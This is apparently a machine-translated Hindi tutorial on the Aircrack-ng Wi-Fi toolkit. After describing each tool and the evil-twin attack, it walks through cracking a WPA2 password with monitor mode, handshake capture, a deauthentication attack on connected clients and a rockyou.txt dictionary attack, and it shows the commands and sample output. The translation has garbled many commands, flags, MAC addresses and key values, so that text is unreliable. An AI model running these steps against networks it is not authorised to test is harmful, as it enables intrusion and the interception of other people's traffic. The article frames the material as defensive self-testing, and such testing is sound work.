Aircrack-ng . का उपयोग कैसे करें

How Use Aircrack Ng



अधिकांश समय, लोग उस नेटवर्क के बारे में कभी नहीं सोचते जिससे वे जुड़े होते हैं। वे कभी नहीं सोचते कि वह नेटवर्क कितना सुरक्षित है और वे दैनिक आधार पर अपने गोपनीय डेटा को कितना जोखिम में डालते हैं। आप एक बहुत शक्तिशाली टूल का उपयोग करके अपने वाईफाई नेटवर्क पर भेद्यता जांच चला सकते हैं Aircrack- एनजी और वायरशर्क। Wireshark का उपयोग नेटवर्क गतिविधि की निगरानी के लिए किया जाता है। Aircrack- एनजी एक आक्रामक उपकरण की तरह है जो आपको हैक करने और वायरलेस कनेक्शन तक पहुंच प्रदान करने देता है। एक घुसपैठिए के रूप में सोचना हमेशा खुद को हैक से बचाने का सबसे सुरक्षित तरीका रहा है। आप सटीक कार्रवाइयों को समझने में सक्षम हो सकते हैं जो एक घुसपैठिया एयरक्रैक के बारे में सीखकर आपके सिस्टम तक पहुंच प्राप्त करने के लिए करेगा। फिर आप यह सुनिश्चित करने के लिए अपने सिस्टम पर अनुपालन जांच कर सकते हैं कि यह असुरक्षित नहीं है।

Aircrack- एनजी वाईफाई नेटवर्क सुरक्षा का परीक्षण करने के लिए डिज़ाइन किया गया सॉफ़्टवेयर का एक पूरा सेट है। यह केवल एक उपकरण नहीं है बल्कि उपकरणों का एक संग्रह है, जिनमें से प्रत्येक एक विशेष उद्देश्य को पूरा करता है। वाईफाई सुरक्षा के विभिन्न क्षेत्रों पर काम किया जा सकता है, जैसे एक्सेस प्वाइंट की निगरानी करना, परीक्षण करना, नेटवर्क पर हमला करना, वाईफाई नेटवर्क को क्रैक करना और उसका परीक्षण करना। Aircrack का मुख्य उद्देश्य पैकेट को इंटरसेप्ट करना और पासवर्ड को तोड़ने के लिए हैश को समझना है। यह लगभग सभी नए वायरलेस इंटरफेस को सपोर्ट करता है। Aircrack- एनजी एक पुराने टूल सूट एयरक्रैक का एक उन्नत संस्करण है, एनजी को संदर्भित करता है नई पीढ़ी . कुछ बेहतरीन टूल जो एक साथ मिलकर बड़े काम को अंजाम देते हैं।







एयरमोन:

एयरमोन-एनजी को एयरक्रैक-एनजी किट में शामिल किया गया है जो नेटवर्क इंटरफेस कार्ड को मॉनिटर मोड में रखता है। नेटवर्क कार्ड आमतौर पर एनआईसी के मैक पते द्वारा परिभाषित उनके लिए लक्षित पैकेट स्वीकार करेंगे, लेकिन एयरमोन-एनजी के साथ, सभी वायरलेस पैकेट, चाहे वे उनके लिए लक्षित हों या नहीं, भी स्वीकार किए जाएंगे। आप इन पैकेटों को एक्सेस प्वाइंट से लिंक या प्रमाणित किए बिना पकड़ने में सक्षम होना चाहिए। इसका उपयोग नेटवर्क इंटरफेस को मॉनिटर मोड में डालकर एक्सेस प्वाइंट की स्थिति की जांच करने के लिए किया जाता है। सबसे पहले मॉनिटर मोड को चालू करने के लिए वायरलेस कार्ड को कॉन्फ़िगर करना होगा, फिर सभी पृष्ठभूमि प्रक्रियाओं को मार दें यदि आपको लगता है कि कोई प्रक्रिया इसमें हस्तक्षेप कर रही है। प्रक्रियाओं को समाप्त करने के बाद, वायरलेस इंटरफ़ेस पर मॉनिटर मोड को नीचे दिए गए आदेश को चलाकर सक्षम किया जा सकता है:



[ईमेल संरक्षित] :~$सुडोairmon-ng start wlan0#

आप नीचे दिए गए आदेश का उपयोग करके कभी भी एयरमोन-एनजी को रोककर मॉनिटर मोड को अक्षम कर सकते हैं:

[ईमेल संरक्षित] :~$सुडोएयरमोन-एनजी स्टॉप wlan0#

एयरोडम्प:

Airodump-ng का उपयोग हमारे आसपास के सभी नेटवर्कों को सूचीबद्ध करने और उनके बारे में बहुमूल्य जानकारी देखने के लिए किया जाता है। एयरोडम्प-एनजी की मूल कार्यक्षमता पैकेटों को सूंघना है, इसलिए यह अनिवार्य रूप से मॉनिटर मोड में रखे जाने के दौरान हमारे आसपास के सभी पैकेटों को हथियाने के लिए प्रोग्राम किया गया है। हम इसे अपने आस-पास के सभी कनेक्शनों के खिलाफ चलाएंगे और नेटवर्क से जुड़े ग्राहकों की संख्या, उनके संबंधित मैक पते, एन्क्रिप्शन शैली और चैनल नाम जैसे डेटा एकत्र करेंगे और फिर अपने लक्षित नेटवर्क को लक्षित करना शुरू करेंगे।

एयरोडम्प-एनजी कमांड टाइप करके और इसे पैरामीटर के रूप में नेटवर्क इंटरफेस नाम देकर, हम इस टूल को सक्रिय कर सकते हैं। यह सभी पहुंच बिंदुओं, डेटा पैकेट की मात्रा, एन्क्रिप्शन और प्रमाणीकरण विधियों का उपयोग, और नेटवर्क का नाम (ईएसएसआईडी) सूचीबद्ध करेगा। हैकिंग के दृष्टिकोण से, मैक पते सबसे महत्वपूर्ण क्षेत्र हैं।

[ईमेल संरक्षित] :~$सुडोairodump-ng wlx0mon

एयरक्रैक:

पासवर्ड क्रैक करने के लिए एयरक्रैक का इस्तेमाल किया जाता है। एयरोडम्प का उपयोग करके सभी पैकेटों को कैप्चर करने के बाद, हम एयरक्रैक द्वारा चाबी को क्रैक कर सकते हैं। यह इन चाबियों को दो विधियों PTW और FMS का उपयोग करके क्रैक करता है। पीटीडब्ल्यू दृष्टिकोण दो चरणों में किया जाता है। सबसे पहले, केवल एआरपी पैकेट का उपयोग किया जा रहा है, और उसके बाद ही, यदि खोज के बाद कुंजी को क्रैक नहीं किया जाता है, तो यह अन्य सभी कैप्चर किए गए पैकेट का उपयोग करता है। पीटीडब्ल्यू दृष्टिकोण का एक प्लस बिंदु यह है कि सभी पैकेटों का उपयोग क्रैकिंग के लिए नहीं किया जाता है। दूसरे दृष्टिकोण में, यानी एफएमएस, हम कुंजी को क्रैक करने के लिए सांख्यिकीय मॉडल और ब्रूट फोर्स एल्गो दोनों का उपयोग करते हैं। एक शब्दकोश विधि का भी उपयोग किया जा सकता है।

एयरप्ले:

एयरप्ले-एनजी ट्रैफिक बनाने या तेज करने के लिए वायरलेस नेटवर्क में पैकेट पेश करता है। एयरप्ले-एनजी द्वारा दो अलग-अलग स्रोतों से पैकेट कैप्चर किए जा सकते हैं। पहला लाइव नेटवर्क है, और दूसरा पहले से मौजूद pcap फ़ाइल से पैकेट है। एयरप्ले-एनजी एक वायरलेस एक्सेस प्वाइंट और एक उपयोगकर्ता को लक्षित करने वाले एक निष्क्रियकरण हमले के दौरान उपयोगी है। इसके अलावा, आप एयरप्ले-एनजी के साथ कॉफ़ी लेटे अटैक जैसे कुछ हमले कर सकते हैं, एक ऐसा उपकरण जो आपको क्लाइंट के सिस्टम से एक कुंजी प्राप्त करने की अनुमति देता है। आप एआरपी पैकेट को पकड़कर और फिर उसमें हेरफेर करके और सिस्टम को वापस भेजकर इसे हासिल कर सकते हैं। क्लाइंट तब एक पैकेट बनाएगा जिसे एयरोडम्प द्वारा कैप्चर किया जा सकता है और एयरक्रैक उस संशोधित पैकेट की कुंजी को क्रैक करता है। एयरप्ले-एनजी के कुछ अन्य हमले विकल्पों में चॉपचॉप, फ्रैगमेंट एर प्रीप्ले आदि शामिल हैं।

एयर बेस:

एयरबेस-एनजी का उपयोग किसी घुसपैठिए के कंप्यूटर को एक समझौता किए गए कनेक्शन बिंदु में बदलने के लिए किया जाता है जिससे दूसरे लोग लिंक कर सकें। एयरबेस-एनजी का उपयोग करके, आप एक कानूनी पहुंच बिंदु होने का दावा कर सकते हैं और अपने नेटवर्क से जुड़े कंप्यूटरों पर आमने-सामने हमले कर सकते हैं। इस तरह के हमलों को ईविल ट्विन अटैक कहा जाता है। बुनियादी उपयोगकर्ताओं के लिए कानूनी पहुंच बिंदु और नकली पहुंच बिंदु के बीच अंतर करना असंभव है। इसलिए, दुष्ट जुड़वां खतरा सबसे खतरनाक वायरलेस खतरों में से एक है जिसका हम आज सामना कर रहे हैं।

ऐरोलिब-एनजी:

ऐरोलिब पासवर्ड सूचियों और एक्सेस प्वाइंट को संग्रहीत और प्रबंधित करके हैकिंग प्रक्रिया को गति देता है। इस प्रोग्राम द्वारा उपयोग किया जाने वाला डेटाबेस मैनेजमेंट सिस्टम SQLite3 है, जो ज्यादातर सभी प्लेटफॉर्म पर उपलब्ध है। पासवर्ड क्रैकिंग में जोड़ीदार मास्टर कुंजी की गणना शामिल है जिसके माध्यम से निजी क्षणिक कुंजी (पीटीके) निकाली जाती है। पीटीके का उपयोग करके, आप किसी दिए गए पैकेट के लिए फ्रेम संदेश पहचान कोड (एमआईसी) निर्धारित कर सकते हैं और सैद्धांतिक रूप से एमआईसी को पैकेट के समान पाते हैं, इसलिए यदि पीटीके सही था, तो पीएमके भी सही था।

डेटाबेस में संग्रहीत पासवर्ड सूची और एक्सेस नेटवर्क देखने के लिए, निम्न आदेश टाइप करें:

[ईमेल संरक्षित] :~$सुडोएयरोलिब-एनजी टेस्टडेटाबेस-आँकड़े

यहां टेस्टडेटाबेस वह डीबी है जिसे आप एक्सेस करना या बनाना चाहते हैं, और -स्टैट्स वह ऑपरेशन है जिसे आप उस पर करना चाहते हैं। आप डेटाबेस फ़ील्ड पर कई ऑपरेशन कर सकते हैं, जैसे किसी SSID या किसी चीज़ को अधिकतम प्राथमिकता देना। एयरक्रैक-एनजी के साथ एयरोलिब-एनजी का उपयोग करने के लिए, निम्न कमांड दर्ज करें:

[ईमेल संरक्षित] :~$सुडोaircrack- एनजी-आरटेस्टडेटाबेस wpa2.eapol.cap

यहां हम पहले से गणना किए गए पीएमके का उपयोग कर रहे हैं परीक्षण डेटाबेस पासवर्ड क्रैकिंग प्रक्रिया को तेज करने के लिए।

Aircrack-ng का उपयोग करके WPA/WPA2 को क्रैक करना:

आइए एक छोटे से उदाहरण को देखें कि एयरक्रैक-एनजी अपने कुछ अद्भुत उपकरणों की मदद से क्या कर सकता है। हम शब्दकोश पद्धति का उपयोग करके WPA/WPA2 नेटवर्क की पूर्व-साझा कुंजी को क्रैक करेंगे।

पहली चीज जो हमें करने की ज़रूरत है वह है मॉनिटर मोड का समर्थन करने वाले नेटवर्क इंटरफेस को सूचीबद्ध करना। यह निम्न आदेश का उपयोग करके किया जा सकता है:

[ईमेल संरक्षित] :~$सुडोएयरमोन-एनजी

PHY इंटरफ़ेस ड्राइवर चिपसेट

Phy0 wlx0 rtl8xxxu Realtek सेमीकंडक्टर कॉर्प।

हम एक इंटरफ़ेस देख सकते हैं; अब, हमें निम्न कमांड का उपयोग करके नेटवर्क इंटरफ़ेस (wlx0) को मॉनिटर मोड में रखना होगा:

[ईमेल संरक्षित] :~$सुडोairmon-ng प्रारंभ wlx0

इसने इंटरफ़ेस पर मॉनिटर मोड को सक्षम किया है जिसे कहा जाता है wlx0mon .

अब हमें अपने नेटवर्क इंटरफेस के माध्यम से आस-पास के राउटर द्वारा प्रसारण सुनना शुरू करना चाहिए जिसे हमने मॉनिटर मोड में रखा है।

[ईमेल संरक्षित] :~$सुडोairodump-ng wlx0mon

चौधरी5 ][गुजर चुके:30एस][ 2020-12-02 00:17



बीएसएसआईडी पीडब्लूआर बीकन#डेटा, #/s सीएच एमबी ईएनसी सिफर ऑथ ईएसएसआईडी



E4: 6F:१३: 04: सीई:31 -चार पांच 62 २७ 0 154e WPA2 CCMP PSK CrackIt

C4:E9:८४:76:10:होना-63 77 0 0 654ई. WPA2 CCMP PSK Hackme

सी8:3ए:35: ए0: 4ई: 01-63 ८४ 0 0 854e WPA2 सीसीएमपी पीएसके नेट07

७४देता है:88:एफए:38: 02-68 28 2 0 ग्यारह54e WPA2 CCMP PSK TP-Link_3802



बीएसएसआईडी स्टेशन पीडब्लूआर रेट लॉस्ट फ्रेम्स जांच



E4: 6F:१३: 04: सीई:315सी:3ए:चार पांच: डी7: ईए: 8बी -3 0- 1e8 5

E4: 6F:१३: 04: सीई:31सी4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:१३: 04: सीई:315सी:सी3:07:56:६१: ईएफ -35 0-1 0 6

E4: 6F:१३: 04: सीई:31ईसा पूर्व:९१:B5:F8:7E:D5 -390ई-1 1002 १३

हमारा लक्ष्य नेटवर्क है सुलझाओ इस मामले में, जो वर्तमान में चैनल 1 पर चल रहा है।

यहां लक्ष्य नेटवर्क के पासवर्ड को क्रैक करने के लिए, हमें 4-वे हैंडशेक कैप्चर करने की आवश्यकता होती है, जो तब होता है जब कोई डिवाइस किसी नेटवर्क से कनेक्ट करने का प्रयास करता है। हम निम्नलिखित कमांड का उपयोग करके इसे कैप्चर कर सकते हैं:

[ईमेल संरक्षित] :~$सुडोएयरोडम्प-एनजी-सी 1--bsid E4: 6F:१३: 04: सीई:31 -में /होम wlx0

-सी : चैनल

-बीएसएसओ : लक्ष्य नेटवर्क के बीएसआईडी

-में : निर्देशिका का नाम जहाँ pcap फ़ाइल रखी जाएगी

अब हमें नेटवर्क से कनेक्ट होने के लिए डिवाइस की प्रतीक्षा करनी होगी, लेकिन हैंडशेक को कैप्चर करने का एक बेहतर तरीका है। हम निम्न आदेश का उपयोग करके एक अप्रमाणिक हमले का उपयोग करके एपी को उपकरणों को निष्क्रिय कर सकते हैं:

[ईमेल संरक्षित] :~$सुडोaireplay-एनजी-0 -प्रतिE4: 6F:१३: 04: सीई:31

प्रति : लक्ष्य नेटवर्क के बीएसआईडी

-0 : प्रमाणीकरण हमला

हमने सभी उपकरणों को डिस्कनेक्ट कर दिया है, और अब हमें नेटवर्क से कनेक्ट होने के लिए डिवाइस की प्रतीक्षा करनी होगी।

चौधरी1 ][गुजर चुके:30एस][ 2020-12-02 00:02][WPA हैंडशेक: E4: 6F:१३: 04: सीई:31



बीएसएसआईडी पीडब्लूआर आरएक्सक्यू बीकन#डेटा, #/s सीएच एमबी ईएनसी सिफर ऑथ ई



E4: 6F:१३: 04: सीई:31 -47 1 228 807 36 154वां WPA2 CCMP PSK P



बीएसएसआईडी स्टेशन पीडब्लूआर रेट लॉस्ट फ्रेम्स जांच



E4: 6F:१३: 04: सीई:31ईसा पूर्व:९१:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:१३: 04: सीई:315सी:3ए:चार पांच: डी7: ईए: 8बी -290e- 1e0 22

E4: 6F:१३: 04: सीई:31 88:28: बी3:30:२७:7ई -310ई-1 0 32

E4: 6F:१३: 04: सीई:31सी4:67:D3:C2:CD:D7 -350e- 6e२६३ 708सुलझाओ

E4: 6F:१३: 04: सीई:31डी4: 6ए: 6ए:99:ईडी:ई3 -350e- 0e0 ८६

E4: 6F:१३: 04: सीई:315सी:सी3:07:56:६१: ईएफ -37 0- 1e0 1

हमें एक हिट मिली, और समय के ठीक बगल में शीर्ष दाएं कोने को देखने पर, हम देख सकते हैं कि एक हैंडशेक कैप्चर किया गया है। अब निर्दिष्ट फ़ोल्डर में देखें ( /घर हमारे मामले में) a . के लिए .pcap फ़ाइल।

WPA कुंजी को क्रैक करने के लिए, हम निम्न कमांड का उपयोग कर सकते हैं:

[ईमेल संरक्षित] :~$सुडोaircrack- एनजी-ए2 -मेंरॉकयू.txt-बीE4: 6F:१३: 04: सीई:31हाथ मिलाना टोपी

बी: लक्ष्य नेटवर्क के बीएसआईडी

-a2 :WPA2 मोड

Rockyou.txt: शब्दकोशफ़ाइलउपयोग किया गया

हाथ मिलाना टोपी: Theफ़ाइल कौनकैप्चर किए गए हैंडशेक शामिल हैं

Aircrack- एनजी1.2बीटा3

[00:01:49] १०५६६चाबियों का परीक्षण किया गया(१०१७.९६प्रति/एस)

कुंजी मिली! [आप समझ गए]

मास्टर कुंजी: 8D EC 0C EA D2 BC 6B H7 J8 K1 A089६बी ७बी ६डी

0सी 06 08 ईडी बीसी 6बी एच7 जे8 के1 ए0896B 7B B F7 6Fपचाससी


क्षणिक कुंजी: 4D C4 5R 6T76 996जी 7एच 8डी ईसी

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896बी

A5 बीडी K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896बी

मैक: सीबी 5ए एफ8 सीई62बी२ १बी एफ७ ६एफपचाससी025 62E9 5D७१

हमारे लक्षित नेटवर्क की कुंजी को सफलतापूर्वक क्रैक कर लिया गया है।

निष्कर्ष:

वायरलेस नेटवर्क हर जगह हैं, प्रत्येक कंपनी द्वारा स्मार्टफोन का उपयोग करने वाले श्रमिकों से लेकर औद्योगिक नियंत्रण उपकरणों तक उपयोग किया जाता है। शोध के अनुसार, 2021 में लगभग 50 प्रतिशत से अधिक इंटरनेट ट्रैफ़िक वाईफाई से अधिक होगा। वायरलेस नेटवर्क के कई फायदे हैं, दरवाजे के बाहर संचार, उन जगहों पर त्वरित इंटरनेट एक्सेस जहां तार लगाना लगभग असंभव है, बिना केबल लगाए नेटवर्क का विस्तार कर सकते हैं किसी भी अन्य उपयोगकर्ता के लिए, और जब आप वहां नहीं होते हैं तो आसानी से अपने मोबाइल उपकरणों को अपने घरेलू कार्यालयों से जोड़ सकते हैं।

इन फायदों के बावजूद, आपकी गोपनीयता और सुरक्षा के बारे में एक बड़ा सवालिया निशान है। इन नेटवर्क के रूप में; राउटर की ट्रांसमिटिंग रेंज के भीतर सभी के लिए खुले हैं, उन पर आसानी से हमला किया जा सकता है, और आपके डेटा से आसानी से समझौता किया जा सकता है। उदाहरण के लिए, यदि आप किसी सार्वजनिक वाईफाई से जुड़े हैं, तो उस नेटवर्क से जुड़ा कोई भी व्यक्ति कुछ खुफिया जानकारी का उपयोग करके और उपलब्ध भयानक टूल की मदद से आपके नेटवर्क ट्रैफ़िक की आसानी से जांच कर सकता है और उसे डंप भी कर सकता है।